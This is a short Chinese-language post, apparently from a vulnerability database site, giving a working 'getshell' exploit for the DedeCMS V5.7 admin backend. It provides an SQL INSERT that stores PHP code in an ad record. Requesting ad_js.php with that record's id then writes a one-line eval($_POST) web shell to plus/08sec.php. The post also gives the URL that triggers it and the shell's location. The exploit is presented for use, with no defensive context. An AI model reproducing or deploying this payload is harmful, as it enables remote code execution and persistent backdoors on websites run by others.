Dede后台getshell【过20130715】
- 发表于
- Vulndb
测试版本为:V5.7 20130715
测试步骤:
后台——SQL命令运器——执行命令
|
1 2 |
INSERT INTO `dede_myad` (`aid`, `clsid`, `typeid`, `tagname`, `adname`, `timeset`, `starttime`, `endtime`, `normbody`, `expbody`) VALUES (2000, 0, 0, 'indexTopBanner1', '首页顶部导航大图-500*60', 0, 1297933028, 1300525028, '<?php file_put_contents(''08sec.php'',''<?php eval($_POST[08]);?>''); ?>', ''); |
访问:http://site/plus/ad_js.php?aid=2000 (id请自行更换)
文件生成在:site/plus/08sec.php
原文连接:Dede后台getshell【过20130715】
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
![织梦DEDECMS search.php注入漏洞EXP[通杀]](https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2013/01/11.jpg&h=144&w=208&zc=1)
